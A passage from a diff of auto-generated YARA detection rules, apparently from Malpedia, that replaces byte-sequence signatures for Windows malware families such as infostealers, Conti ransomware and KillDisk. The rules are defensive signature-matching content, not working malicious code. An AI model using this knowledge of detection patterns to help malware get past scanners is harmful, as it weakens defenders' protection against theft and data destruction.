 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kleptoparasite_stealer_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gopuram_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e5b373205c1fe87c3fe6e4fda207e494d76c79369af53b1f38b96981f46a089f"
-		score = 60
-		quality = 35
+		logic_hash = "6d230510a2c3f67fb9a008e4b353ed01e99faca2f2088eff568ec22152cbe40b"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116364,32 +116328,32 @@ rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 }
-		$sequence_1 = { cc 55 8bec 56 e8???????? 8b7508 6a02 }
-		$sequence_2 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? }
-		$sequence_3 = { 895104 8be5 5d c3 3b0d???????? 7502 f3c3 }
-		$sequence_4 = { 7405 8901 895104 8be5 5d c3 3b0d???????? }
-		$sequence_5 = { cc 55 8bec 56 e8???????? 8b7508 }
-		$sequence_6 = { 59 c3 6a10 68???????? e8???????? 33ff 897de0 }
-		$sequence_7 = { 895104 8be5 5d c3 3b0d???????? }
-		$sequence_8 = { 895104 8be5 5d c3 3b0d???????? 7502 }
-		$sequence_9 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 }
+		$sequence_0 = { 488d15a3cb0200 488d0d645c0500 e8???????? 488d15c4c60200 488bc8 488b5c2430 4883c420 }
+		$sequence_1 = { e8???????? 85c0 743e 488d157b930500 488bcf e8???????? 85c0 }
+		$sequence_2 = { ff10 4c8bc7 ba10000000 488bcb e8???????? 488bc3 e9???????? }
+		$sequence_3 = { 7e1c 4183ff09 0f8eae000000 4183ff0a 750c 488d05833c0500 4889442450 }
+		$sequence_4 = { e8???????? 488d5606 488d4da8 41b802000000 66448965bc e8???????? 488d560c }
+		$sequence_5 = { 8be8 85ed 0f842f010000 488b5c2470 488d8b18010000 ff15???????? 498b06 }
+		$sequence_6 = { 8bd8 e8???????? 4c8d05df1e0800 41b9de010000 8bd7 498bce c744242000000000 }
+		$sequence_7 = { 85f6 0f8486050000 488b85600a0000 4889442440 c744242801000000 48895c2420 4533c9 }
+		$sequence_8 = { c705????????03400080 c705????????f4060780 890d???????? c705????????09000380 418bc4 413b7ffc 750d }
+		$sequence_9 = { 488bcd e8???????? 8bf8 85c0 782a 498bd6 488bcd }
 
 	condition:
-		7 of them and filesize < 3006464
+		7 of them and filesize < 1591296
 }
-rule MALPEDIA_Win_Tetra_Loader_Auto : FILE
+rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85991250-1047-5fcf-96eb-85da5fe13b43"
+		id = "ff6d02a5-11a9-5b9c-bc25-58f6a66b5d47"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tetra_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tetra_loader_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mystic_stealer_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "aeb4a8ec8acfdc787245eb94a88275106cbf235fc1e5fc83f04d972b90088a86"
+		logic_hash = "ec33f5bc78df8bf32bd1dfa20b10a2a5389598f3b75f6130cffa6e3d8120ea9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116403,32 +116367,32 @@ rule MALPEDIA_Win_Tetra_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 440fb74204 4181f074350000 4109c8 0f8480050000 3302 0fb74a04 81f174360000 }
-		$sequence_1 = { 66f7e6 0f8010010000 89c2 6601ea 410f92c6 31c0 81fdffff0000 }
-		$sequence_2 = { e8???????? 0f0b 4c8d059f8a0100 b901000000 4c89d2 e8???????? 0f0b }
-		$sequence_3 = { 4531db 81f9ffff0000 7715 6666666666662e0f1f840000000000 41bc03000000 4c89f2 }
-		$sequence_4 = { 7521 c6851717000000 488d8db8160000 488d154ce70200 e8???????? 488bb5c0160000 66c746023b00 }
-		$sequence_5 = { 48ffc7 4c89f0 4d89fb bd00000000 4885c0 0f856bffffff ebb4 }
-		$sequence_6 = { 488901 b001 f6c201 7513 488b4110 488b4820 488b4028 }
-		$sequence_7 = { 483b7df0 75bc eb8d 4489e1 83e11f 450fb64701 4183e03f }
-		$sequence_8 = { 4883c1fe 3d00010000 89d0 73a1 0fb64500 8845d0 0f2845e0 }
-		$sequence_9 = { 488b4de8 48c744243000000000 c744242880000000 c744242003000000 ba00000080 41b801000000 4531c9 }
+		$sequence_0 = { 7509 3bef 7505 33db 43 eb02 33db }
+		$sequence_1 = { 741f 8b0e 50 8b510c e8???????? 8b06 59 }
+		$sequence_2 = { 3b5c242c 7f59 66ff84463c0b0000 33c9 }
+		$sequence_3 = { e8???????? 83bd5014000002 59 59 }
+		$sequence_4 = { 8bc2 41 3bca 8b542418 0f4ec1 8b4c2414 89442430 }
+		$sequence_5 = { 8bcf c7460471000000 e8???????? 33c9 394e14 }
+		$sequence_6 = { 5b e9???????? a1???????? 8bcf c746049a020000 894718 e8???????? }
+		$sequence_7 = { 3bca 7420 0fb7449d02 8bca }
+		$sequence_8 = { 80ea03 c6040101 8b8ea0160000 8b8698160000 41 898ea0160000 c6040100 }
+		$sequence_9 = { 57 ffb42444010000 ffb4244c010000 50 }
 
 	condition:
-		7 of them and filesize < 847872
+		7 of them and filesize < 465920
 }
-rule MALPEDIA_Win_Rustock_Auto : FILE
+rule MALPEDIA_Win_Bangat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81c11374-a224-57b2-ae9d-b05ee172db6b"
+		id = "05c414bb-9422-5f0e-974d-c56fdab166b4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rustock_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bangat_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f23c8787fe5677c0679006ea20fcb161a3a7545dab517b9c25455040e02f455c"
+		logic_hash = "5cb16644073e6088f8c102fdd3bad27fec482e34ef437064c8f923550a4b4259"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116442,32 +116406,32 @@ rule MALPEDIA_Win_Rustock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8945c0 85c0 7504 33f6 eb21 ff751c }
-		$sequence_1 = { f7d1 8b15???????? 8d6424fc 893424 5a 31c6 }
-		$sequence_2 = { 7403 46 ebd4 0fb60e 46 83f92d 8bd1 }
-		$sequence_3 = { 29f8 83cbff f7d3 b8670e0100 8d0dc8680100 01d0 }
-		$sequence_4 = { 53 ffd6 68ad020000 53 a3???????? ffd6 689d020000 }
-		$sequence_5 = { df7809 60 9f 79c1 7cc2 }
-		$sequence_6 = { 68d44f0100 59 0315???????? 21fb 031d???????? 31f1 83f2ff }
-		$sequence_7 = { 57 68e1030000 ff550c 68d1030000 }
-		$sequence_8 = { 8bc7 e9???????? 897dcc 33db 897dc8 397d08 7508 }
-		$sequence_9 = { 8d04bd04000000 50 e8???????? 8bd8 }
+		$sequence_0 = { 50 8d45fc 50 e8???????? 8b4508 8325????????00 83c418 }
+		$sequence_1 = { 3bc7 7d02 8bc7 50 ff75d8 68???????? 56 }
+		$sequence_2 = { 8a8888f44000 ff248d30f44000 8b5e6c 5f 8bc3 5e 5b }
+		$sequence_3 = { 33c9 8a4c2432 8a9950ec4700 33c9 8aa850ec4700 8bfb }
+		$sequence_4 = { 6859020000 68???????? 68fc000000 6a77 6a14 e8???????? }
+		$sequence_5 = { 8b348d50e84700 33c6 8d7720 8bbff0000000 33c5 d1ff 4f }
+		$sequence_6 = { 83c40c 6a0a 53 53 8d45f4 53 }
+		$sequence_7 = { ff15???????? 85c0 742d 8d85d4feffff 50 8d85d4f5ffff 68???????? }
+		$sequence_8 = { 895c2424 897c2428 e8???????? 83c414 e8???????? 53 }
+		$sequence_9 = { 85c0 749b 6803002e00 6a00 6812030000 68ffff0000 }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 1228800
 }
-rule MALPEDIA_Win_Octowave_Auto : FILE
+rule MALPEDIA_Win_Virdetdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "35c13348-0eb4-5d13-a207-5c2013e4210f"
+		id = "bddd89ab-b028-56e4-8a65-8d3729c122ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.octowave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.octowave_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virdetdoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1fa979b8176587b51d4501d3bbb1e6a1953eac27bc34cded0325574b49761409"
+		logic_hash = "57c5b5ddcc0bcf4c5308e3cdd78b8a805ec821f22a4427e25f940eedfad4c1ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116481,34 +116445,34 @@ rule MALPEDIA_Win_Octowave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fecb 889c24c0000000 8b9c244c010000 85db 7529 8d9c242c010000 8d7b01 }
-		$sequence_1 = { ff86201b0000 8b86201b0000 c684302013000000 83ef01 75d3 8b5c2414 85d2 }
-		$sequence_2 = { ff742450 56 e8???????? 83c408 85c0 0f850a040000 83cb10 }
-		$sequence_3 = { 8d4f02 51 56 e8???????? 83c408 5f 8bc6 }
-		$sequence_4 = { ff742418 2bf5 ff742424 8b04b568022110 ffd0 8b7c241c 83c40c }
-		$sequence_5 = { ff7500 50 e8???????? 83c408 837db800 750a f30f1015???????? }
-		$sequence_6 = { f30f5cc8 f30f1041e8 f30f594714 f30f5cc8 f30f1041e4 f30f594718 f30f5cc8 }
-		$sequence_7 = { f76b14 03f8 8b4560 13ca f76b18 03f8 8b455c }
-		$sequence_8 = { ff5004 48 8bcf 50 ff560c 8b17 8bcf }
-		$sequence_9 = { ff74241c 8b4608 8b4e04 48 f20f1044242c 23c2 6a00 }
+		$sequence_0 = { 83c40c 83feff 7502 33f6 }
+		$sequence_1 = { 0fb74714 50 ff15???????? 0fb7c0 50 }
+		$sequence_2 = { 59 3945fc 7e4e 397dfc 7e49 8b35???????? 68???????? }
+		$sequence_3 = { 53 56 57 8bf9 c745f810270000 33db 33c9 }
+		$sequence_4 = { 6a0c 50 52 51 ff15???????? }
+		$sequence_5 = { 8b7d10 57 7434 8b35???????? ffd6 50 8d45cc }
+		$sequence_6 = { c6010b e9???????? c6010c e9???????? c6010d e9???????? }
+		$sequence_7 = { 83c40c 83c01c 50 6a08 ff15???????? }
+		$sequence_8 = { 3bc1 75ec 3903 74d2 ebe6 85ff 75cc }
+		$sequence_9 = { ff35???????? ff15???????? 8bc8 85c9 7450 6a5c }
 
 	condition:
-		7 of them and filesize < 7258112
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Dustpan_Auto : FILE
+rule MALPEDIA_Win_Conti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9c878b8-cad8-5a19-8f4e-78ad38029b7f"
+		id = "495a4961-c51d-5437-b6e5-42c5ef6dadea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustpan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dustpan_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.conti_auto.yar#L1-L249"
 		license_url = "N/A"
-		logic_hash = "5224f428476ca9b9e044abefc44ce9a53e06974708bc3448eb44f67994867ab4"
+		logic_hash = "8e7e21e9b7d082151509bf910013dc897955e4fc02be809b33bd86909bb72949"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116520,32 +116484,48 @@ rule MALPEDIA_Win_Dustpan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4533c0 4c891d???????? e8???????? 488d0d32010000 4883c420 5b e9???????? }
-		$sequence_1 = { b9ff000000 e8???????? 488bfb 4803ff 4c8d2d45eb0000 }
-		$sequence_2 = { 488d0d19a80100 33d2 c744242800000008 895c2420 ffd0 488b4d00 4833cc }
-		$sequence_3 = { 4c8be7 4c8bf7 49c1fe05 4c8d3dffb60000 }
-		$sequence_4 = { 488d05fb0a0100 eb04 4883c014 8918 e8???????? 4c8d15e30a0100 4885c0 }
-		$sequence_5 = { 7440 66448923 8a45d8 4b8b8cf8e0d00100 88443109 8a45d9 }
-		$sequence_6 = { e9???????? 488d0d45010000 e9???????? 4883ec28 488d0d12910000 e8???????? 488d0d39010000 }
-		$sequence_7 = { 488bca 48c1f905 4c8d0533760100 83e21f }
-		$sequence_8 = { 4889442420 e8???????? 488d8380000000 803800 741d 4c8d0df2bc0000 41b802000000 }
-		$sequence_9 = { 894704 e9???????? 488d0d351f0100 48394c2458 7427 }
+		$sequence_0 = { 7542 53 bb0e000000 57 8d7e01 8d7371 }
+		$sequence_1 = { 56 8bf1 8975fc 803e00 7542 53 bb0e000000 }
+		$sequence_2 = { 8d7f01 0fb6c0 b957000000 2bc8 }
+		$sequence_3 = { 0f1f4000 8a07 8d7f01 0fb6c0 b966000000 2bc8 }
+		$sequence_4 = { 8d7f01 0fb6c0 b927000000 2bc8 }
+		$sequence_5 = { 8d7f01 0fb6c0 b978000000 2bc8 }
+		$sequence_6 = { 56 57 bf0e000000 8d7101 }
+		$sequence_7 = { 8d7f01 0fb6c0 b918000000 2bc8 }
+		$sequence_8 = { ff75fc ff15???????? e9???????? 6800800000 }
+		$sequence_9 = { 57 56 ff15???????? ff75f8 56 ff15???????? }
+		$sequence_10 = { 7605 b800005000 6a00 8d4c2418 }
+		$sequence_11 = { ffd0 85c0 7519 c705????????0a000000 e9???????? b801000000 e9???????? }
+		$sequence_12 = { 6810660000 ff7508 ff15???????? 85c0 }
+		$sequence_13 = { e8???????? 8bb6007d0000 85f6 75ef }
+		$sequence_14 = { ff75f8 ff15???????? 85c0 7508 6a01 ff15???????? 6aff }
+		$sequence_15 = { 7411 a801 740d 83f001 50 ff7608 ff15???????? }
+		$sequence_16 = { 53 56 8bf1 57 ff7608 ff15???????? }
+		$sequence_17 = { 3ce9 7412 3cff 0f859d000000 807f0125 0f8593000000 }
+		$sequence_18 = { 85c0 742b 03f0 03d8 }
+		$sequence_19 = { 41b901000000 4533c0 488bd3 488bce }
+		$sequence_20 = { 410f4ff5 488bcb 448bc6 ffd0 }
+		$sequence_21 = { 49f7e8 4903d0 48c1fa06 488bca 48c1e93f 4803d1 488d3c92 }
+		$sequence_22 = { 72c3 488b7c2448 b801000000 488b742440 4883c430 }
+		$sequence_23 = { ffd0 4c3beb 740f 4c3bfb 740a 4c3bf3 }
+		$sequence_24 = { 4833c4 4889442438 4533e4 418be8 4489642430 4c8bfa 4c8bf1 }
+		$sequence_25 = { 8b4c2430 8b05???????? 03c7 03c8 894c2430 8b442430 }
 
 	condition:
-		7 of them and filesize < 282624
+		7 of them and filesize < 520192
 }
-rule MALPEDIA_Win_Pss_Auto : FILE
+rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f53afdc-5ec6-5728-abfd-d91f1e9f3440"
+		id = "a90e0914-4bb5-5c18-8701-049f4c06d7e8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pss_auto.yar#L1-L139"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermeticwizard_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1278c29ce9286804a6a68366ec725de6162c277ad4b04021e24c075a2ce1e54a"
+		logic_hash = "942915314ef1e17eaccf9202ed3b81b64aa22d4533742c599cd868661ae4ab21"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116559,35 +116539,32 @@ rule MALPEDIA_Win_Pss_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d48fe e8???????? e9???????? 83f811 }
-		$sequence_1 = { 7437 ff15???????? 3de5030000 752a }
-		$sequence_2 = { ff15???????? 83ceff 3bc6 7504 }
-		$sequence_3 = { 8d4dbc c745fc02000000 e8???????? 8d8550ffffff 50 8d45bc }
-		$sequence_4 = { 6a00 ff15???????? 50 ff15???????? b001 eb24 e8???????? }
-		$sequence_5 = { 8d7f08 8b048d387a0010 ffe0 f7c703000000 }
-		$sequence_6 = { 83feff 0f8413020000 33c0 8d7c2424 ab ab ab }
-		$sequence_7 = { 51 ff75dc ff15???????? 85c0 751c }
-		$sequence_8 = { 8bf0 488bcd ff15???????? 85f6 740f 4439b42488000000 }
-		$sequence_9 = { 90 4c89642420 4c89642428 e8???????? }
-		$sequence_10 = { 48895d90 4c896588 4488642478 448d430c }
-		$sequence_11 = { 750d 48890a 488b4908 44384119 74ea }
-		$sequence_12 = { a801 7524 83c801 8905???????? 488d05c93d0000 488905???????? }
+		$sequence_0 = { 6800080000 50 e8???????? 83c410 85c0 }
+		$sequence_1 = { 1bdb 83cb01 85db 0f94c0 }
+		$sequence_2 = { 6685db 7415 668b5902 663b5f02 750f 83c104 83c704 }
+		$sequence_3 = { 6689853effffff 66898540ffffff 33c0 66898542ffffff 8b45f8 66898d16ffffff }
+		$sequence_4 = { 3bc7 7442 8b35???????? 83c008 50 }
+		$sequence_5 = { 57 8bf1 8bfa 68???????? 56 ff15???????? 85c0 }
+		$sequence_6 = { 894310 8b45f0 c745ec989d0110 8d1486 }
+		$sequence_7 = { 7410 68???????? 8bce e8???????? 59 894308 }
+		$sequence_8 = { 668b4104 663b4204 750b 8b4108 3b4208 7503 }
+		$sequence_9 = { 50 e8???????? 3b30 7533 8b45fc }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
+rule MALPEDIA_Win_Chairsmack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "06945ffb-74bb-55c6-897c-840bc8a35717"
+		id = "4b93b15a-7734-556f-a7b1-b4512d41aa64"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.temp_stealer_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chairsmack_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0687eb315a2ca722457708cc43ae8e72e82f9cde0b8833cdb29551011317ae50"
+		logic_hash = "1d38706ad5291374964e24dbf3b78379e0e5a0a84fd9338e0e05cc9f4e1d7fa2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116601,71 +116578,71 @@ rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4d08 e8???????? 4403f7 4883c330 443bb518020000 0f8c37ffffff 488b5d00 }
-		$sequence_1 = { 488d1537b00300 488bcb ff15???????? 488945b0 488d1533b00300 488bcb ff15???????? }
-		$sequence_2 = { f20f58cb f20f58cf f20f102d???????? 488d1592e10100 f20f59ee f2430f1004c1 }
-		$sequence_3 = { 4533c0 baa00f0000 e8???????? 488b05???????? 4c8d05f52b0300 488bd5 48c1fa06 }
-		$sequence_4 = { 488d0526dc0100 483947f0 741a 488b0f 4885c9 7412 833900 }
-		$sequence_5 = { 90 488b8d80000000 e8???????? 90 498bcd }
-		$sequence_6 = { 488b13 48c1e205 4883c208 488bcb e8???????? 90 4183660800 }
-		$sequence_7 = { 894708 488d5901 41bf20000000 418bc7 48f7e3 498d4fdf 480f40c1 }
-		$sequence_8 = { 48895c2478 488d5530 488d4c2460 e8???????? 90 488d5580 }
-		$sequence_9 = { 90 488d442440 48894558 4c897c2440 4c897c2450 48895c2458 488d153cc80300 }
+		$sequence_0 = { 8a01 41 84c0 75f9 2b4dac 8d450c 6a00 }
+		$sequence_1 = { c7462000000000 c7462400000000 c7462800000000 c7462c00000000 e8???????? 6819020000 68???????? }
+		$sequence_2 = { 8d44241c 50 e8???????? 50 c684248c00000002 e8???????? }
+		$sequence_3 = { 8b8dd0fdffff 83e11f c1e106 030c85d06d4a00 898d30fdffff eb0a c78530fdffff78474a00 }
+		$sequence_4 = { 50 e8???????? 83c404 8d8580feffff 68b8000000 6a00 50 }
+		$sequence_5 = { 68???????? e8???????? 83ec1c c68424b80300009f 8bcc 68???????? e8???????? }
+		$sequence_6 = { 837dc800 7526 68???????? 68???????? 6a00 68de000000 68???????? }
+		$sequence_7 = { ff15???????? 8b4d08 8b148dcc504a00 83e202 740d 8d85e4dfffff 50 }
+		$sequence_8 = { 0fb745ec eb5a 8d45ec 8d4dc8 3945c0 7579 8d4594 }
+		$sequence_9 = { 7207 8b16 895518 eb03 897518 83f810 7204 }
 
 	condition:
-		7 of them and filesize < 652288
+		7 of them and filesize < 1974272
 }
-rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE
+rule MALPEDIA_Win_Avrecon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88136c82-87ab-5f89-8963-9afb9534a540"
-		date = "2021-10-07"
-		modified = "2021-10-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermes_ransom_auto.yar#L1-L125"
+		id = "e925dd84-abb8-59f0-bccd-32907a99e474"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avrecon_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915"
+		logic_hash = "765f86e5cde1b429c99a3eaacfdc82ca40acf684e216c378122ba2b0c85c22ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20211007"
-		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
-		malpedia_version = "20211008"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 }
-		$sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? }
-		$sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 }
-		$sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 }
-		$sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff }
-		$sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 }
-		$sequence_6 = { 59 6bc900 668981e8c34000 6a02 }
-		$sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 }
-		$sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 }
-		$sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 }
+		$sequence_0 = { 6a24 8d4554 50 e8???????? }
+		$sequence_1 = { 8d45f8 50 53 ff75ec c745f801000000 ffd7 83f8ff }
+		$sequence_2 = { 83791c01 7511 6a00 8d4514 50 56 57 }
+		$sequence_3 = { 8d4401fc c7457401000000 894570 8d7c1f04 837d7000 }
+		$sequence_4 = { 807d7301 7508 e8???????? 885d73 8d85a8f3ffff 50 }
+		$sequence_5 = { 8d85a8f7ffff 50 c7454000040000 ff15???????? }
+		$sequence_6 = { 51 894d30 33c0 8d8d18feffff 40 51 50 }
+		$sequence_7 = { 50 bb7f660440 53 ff7508 c745f801000000 ffd7 83f8ff }
+		$sequence_8 = { 50 e8???????? 85c0 7466 6a0e 68???????? }
+		$sequence_9 = { 83650800 b8e8030000 660105???????? 0fb705???????? 50 ffd6 668945de }
 
 	condition:
-		7 of them and filesize < 7192576
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Heloag_Auto : FILE
+rule MALPEDIA_Win_Killdisk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ed63d6a-bd5d-5cf3-8c24-b83f34a89c57"
+		id = "1c433beb-dada-5b26-9857-13f0bee328ff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heloag_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.killdisk_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "2f5a3d733baee006935f8eba431242cec5f8a5f8274d648625719943963ee673"
+		logic_hash = "50990d6a3b9890877b878363fc44a7021b275eb6d67ceb6edc1c960b038217f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116679,38 +116656,38 @@ rule MALPEDIA_Win_Heloag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 f3a5 8a0d???????? 8dbdadfdffff 888dacfdffff }
-		$sequence_1 = { a1???????? 6889130000 68???????? 8b4810 51 e8???????? 83f8ff }
-		$sequence_2 = { 3bc2 7e7f 33f6 ff15???????? 257f000080 7905 }
-		$sequence_3 = { 90 90 8b45e4 b919000000 25ffff0000 99 }
-		$sequence_4 = { 83c261 52 99 f7f9 8d85dcfdffff 83c261 52 }
-		$sequence_5 = { 50 68???????? ff15???????? 50 ffd3 8d8dd8fcffff }
-		$sequence_6 = { 99 f7f9 8b45c8 25ffff0000 }
-		$sequence_7 = { 8b0d???????? 8b15???????? 8985e0faffff 66a1???????? }
-		$sequence_8 = { 8b4e0c 3bcd 8b07 89442410 7464 }
-		$sequence_9 = { 50 53 8bcd ff15???????? 6a00 6a00 8bcd }
-		$sequence_10 = { 7505 a1???????? 894304 8b5608 895308 }
-		$sequence_11 = { f2ae f7d1 49 51 56 68???????? }
-		$sequence_12 = { 8b11 8bcf 52 6a00 50 }
-		$sequence_13 = { ff15???????? 8a4c2413 6a00 884c244c 8d4c244c }
-		$sequence_14 = { 53 68???????? 8d4c2420 ff15???????? }
-		$sequence_15 = { ff15???????? 84c0 7420 8b7d04 }
+		$sequence_0 = { ff15???????? 8945e4 8b7508 c7465c904c4200 33ff }
